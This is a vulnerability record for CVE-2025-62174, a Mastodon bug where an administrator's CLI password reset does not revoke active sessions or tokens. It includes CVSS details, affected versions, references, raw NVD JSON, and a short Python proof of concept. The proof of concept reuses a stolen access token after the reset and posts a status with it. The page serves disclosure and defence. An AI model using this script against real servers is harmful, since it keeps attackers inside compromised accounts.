CVE-2025-62174

Description

Mastodon is a free, open-source social network server based on ActivityPub. In Mastodon before 4.4.6, 4.3.14, and 4.2.27, when an administrator resets a user account's password via the command-line interface using `bin/tootctl accounts modify --reset-password`, active sessions and access tokens for that account are not revoked. This allows an attacker with access to a previously compromised session or token to continue using the account after the password has been reset. This issue has been patched in versions 4.2.27, 4.3.14, and 4.4.6. No known workarounds exist.

CVSS Details

CVSS Score

3.5

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* - VULNERABLE

Mastodon < 4.2.27

Mastodon 4.3.x < 4.3.14

Mastodon 4.4.x < 4.4.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-62174 - Mastodon Password Reset Session Not Revoked PoC
# This PoC demonstrates the vulnerability where sessions/tokens are not revoked after password reset

# Step 1: Attacker obtains a valid session token or access token through prior compromise
# (e.g., phishing, XSS, or information disclosure)
ATTACKER_TOKEN = "attacker_obtained_access_token_xxxxx"
TARGET_INSTANCE = "https://mastodon.example.com"

# Step 2: Attacker verifies the token is still active
import requests

headers = {
    "Authorization": f"Bearer {ATTACKER_TOKEN}"
}

# Verify account access before password reset
response = requests.get(f"{TARGET_INSTANCE}/api/v1/accounts/verify_credentials", headers=headers)
print(f"Before reset - Status: {response.status_code}")
print(f"Account: {response.json().get('username')}")

# Step 3: Admin resets the target user's password via CLI (vulnerable command)
# $ bin/tootctl accounts modify <username> --reset-password
# The password is reset, but sessions and tokens are NOT revoked

# Step 4: Attacker verifies the token is STILL valid after password reset
response_after = requests.get(f"{TARGET_INSTANCE}/api/v1/accounts/verify_credentials", headers=headers)
print(f"After reset - Status: {response_after.status_code}")  # Still 200 = VULNERABLE
print(f"Account: {response_after.json().get('username')}")  # Still accessible

# Step 5: Attacker can continue to perform actions using the old token
# e.g., post statuses, read DMs, follow/unfollow accounts, etc.
post_data = {"status": "Compromised account - attacker still has access!"}
response_post = requests.post(f"{TARGET_INSTANCE}/api/v1/statuses", headers=headers, json=post_data)
print(f"Malicious post status: {response_post.status_code}")  # Would succeed if vulnerable

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62174
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62174
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62174/
[4] VulDB https://vuldb.com/cve/CVE-2025-62174
[5] https://github.com/mastodon/mastodon/commit/1631fb80e8029d2c5425a03a2297b93f7e225217
[6] https://github.com/mastodon/mastodon/security/advisories/GHSA-f3q3-rmf7-9655

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62174", "sourceIdentifier": "[email protected]", "published": "2025-10-13T21:15:34.770", "lastModified": "2025-10-20T17:20:08.917", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mastodon is a free, open-source social network server based on ActivityPub. In Mastodon before 4.4.6, 4.3.14, and 4.2.27, when an administrator resets a user account's password via the command-line interface using `bin/tootctl accounts modify --reset-password`, active sessions and access tokens for that account are not revoked. This allows an attacker with access to a previously compromised session or token to continue using the account after the password has been reset. This issue has been patched in versions 4.2.27, 4.3.14, and 4.4.6. No known workarounds exist."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.2.27", "matchCriteriaId": "5AFD1281-DEE1-421D-B62B-8D9727428763"}, {"vulnerable": true, "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.3.0", "versionEndExcluding": "4.3.14", "matchCriteriaId": "CE867F92-59FF-4768-974B-D4BDF71B1FFA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4.0", "versionEndExcluding": "4.4.6", "matchCriteriaId": "6F6F2EB3-8C86-417E-8D7B-499438B63D61"}]}]}], "references": [{"url": "https://github.com/mastodon/mastodon/commit/1631fb80e8029d2c5425a03a2297b93f7e225217", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/mastodon/mastodon/security/advisories/GHSA-f3q3-rmf7-9655", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}